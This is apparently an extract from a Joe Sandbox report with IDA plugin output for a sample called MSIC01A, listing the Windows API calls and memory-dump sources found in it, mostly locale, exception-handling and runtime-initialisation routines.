                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __floor_pentium4
                                                                                                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                        • API String ID: 4168288129-2761157908
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,00F6E8D1,00000002,00000000,?,?,?,00F6E8D1,?,00000000), ref: 00F6E64C
                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,00F6E8D1,00000002,00000000,?,?,?,00F6E8D1,?,00000000), ref: 00F6E675
                                                                                                                                                                        • GetACP.KERNEL32(?,?,00F6E8D1,?,00000000), ref: 00F6E68A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                        • String ID: ACP$OCP
                                                                                                                                                                        • API String ID: 2299586839-711371036
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _swprintf$FreeLocal
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2429749586-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00F657CC: GetLastError.KERNEL32(?,00000008,00F6AD4C), ref: 00F657D0
                                                                                                                                                                          • Part of subcall function 00F657CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00F65872
                                                                                                                                                                        • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00F6E894
                                                                                                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 00F6E8DD
                                                                                                                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 00F6E8EC
                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00F6E934
                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00F6E953
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 415426439-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _strrchr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3213747228-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00F533B4
                                                                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 00F53480
                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F534A0
                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 00F534AA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 254469556-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00F3C630: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,72A902E8,?,00F73D30,000000FF), ref: 00F3C657
                                                                                                                                                                          • Part of subcall function 00F3C630: GetLastError.KERNEL32(?,00000000,00000000,72A902E8,?,00F73D30,000000FF), ref: 00F3C661
                                                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,00F88AF0), ref: 00F3D0D8
                                                                                                                                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,00F88AF0), ref: 00F3D0E7
                                                                                                                                                                        Strings
                                                                                                                                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00F3D0E2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                                                                                                                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                        • API String ID: 3511171328-631824599
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00F657CC: GetLastError.KERNEL32(?,00000008,00F6AD4C), ref: 00F657D0
                                                                                                                                                                          • Part of subcall function 00F657CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00F65872
                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F6E28B
                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F6E2D5
                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F6E39B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InfoLocale$ErrorLast
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 661929714-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00F56F13
                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00F56F1D
                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00F56F2A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3906539128-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000,72A902E8,00000001,00000000,?,00000000,00F74460,000000FF,?,00F3474D,00F33778,?,00000000,00000000,?), ref: 00F345DB
                                                                                                                                                                        • LockResource.KERNEL32(00000000,?,00000000,00F74460,000000FF,?,00F3474D,00F33778,?,00000000,00000000,?,?,?,?,00F33778), ref: 00F345E6
                                                                                                                                                                        • SizeofResource.KERNEL32(00000000,00000000,?,00000000,00F74460,000000FF,?,00F3474D,00F33778,?,00000000,00000000,?,?,?), ref: 00F345F4
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Resource$LoadLockSizeof
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2853612939-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00F67F64,00000000,00000000,00000000), ref: 00F67E23
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InformationTimeZone
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 565725191-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00F684B8,?,?,00000008,?,?,00F714E4,00000000), ref: 00F686EA
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExceptionRaise
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3997070919-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00F535BF
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FeaturePresentProcessor
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2325560087-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Strings
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: 0
                                                                                                                                                                        • API String ID: 0-4108050209
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00F657CC: GetLastError.KERNEL32(?,00000008,00F6AD4C), ref: 00F657D0
                                                                                                                                                                          • Part of subcall function 00F657CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00F65872
                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F6E4DE
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$InfoLocale
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3736152602-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00F657CC: GetLastError.KERNEL32(?,00000008,00F6AD4C), ref: 00F657D0
                                                                                                                                                                          • Part of subcall function 00F657CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00F65872
                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(00F6E237,00000001,00000000,?,-00000050,?,00F6E868,00000000,?,?,?,00000055,?), ref: 00F6E183
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2417226690-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00F657CC: GetLastError.KERNEL32(?,00000008,00F6AD4C), ref: 00F657D0
                                                                                                                                                                          • Part of subcall function 00F657CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00F65872
                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00F6E453,00000000,00000000,?), ref: 00F6E6E5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$InfoLocale
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3736152602-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00F657CC: GetLastError.KERNEL32(?,00000008,00F6AD4C), ref: 00F657D0
                                                                                                                                                                          • Part of subcall function 00F657CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00F65872
                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(00F6E48A,00000001,?,?,-00000050,?,00F6E82C,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00F6E1F6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2417226690-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00F61C9A: EnterCriticalSection.KERNEL32(-00F8DE50,?,00F63576,?,00F8A078,0000000C,00F63841,?), ref: 00F61CA9
                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(00F67125,00000001,00F8A1D8,0000000C,00F67554,00000000), ref: 00F6716A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1272433827-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00F657CC: GetLastError.KERNEL32(?,00000008,00F6AD4C), ref: 00F657D0
                                                                                                                                                                          • Part of subcall function 00F657CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00F65872
                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(00F6E01F,00000001,?,?,?,00F6E88A,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00F6E0FD
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2417226690-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLocaleInfoEx.KERNEL32(?,00000022,00000000,00000002,?,?,00F500E2,00000000,00000000,00000004,00F4ED14,00000000,00000004,00F4F127,00000000,00000000), ref: 00F52410
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2299586839-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00F64E3F,?,20001004,00000000,00000002,?,?,00F64441), ref: 00F676E3
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2299586839-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_0002354B,00F53077), ref: 00F53544
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00F52C98: EnterCriticalSection.KERNEL32(00F8DD3C,?,?,?,00F323B6,00F8E638,72A902E8,?,?,00F73D6D,000000FF), ref: 00F52CA3
                                                                                                                                                                          • Part of subcall function 00F52C98: LeaveCriticalSection.KERNEL32(00F8DD3C,?,?,?,00F323B6,00F8E638,72A902E8,?,?,00F73D6D,000000FF), ref: 00F52CE0
                                                                                                                                                                        • GetProcessHeap.KERNEL32 ref: 00F32365
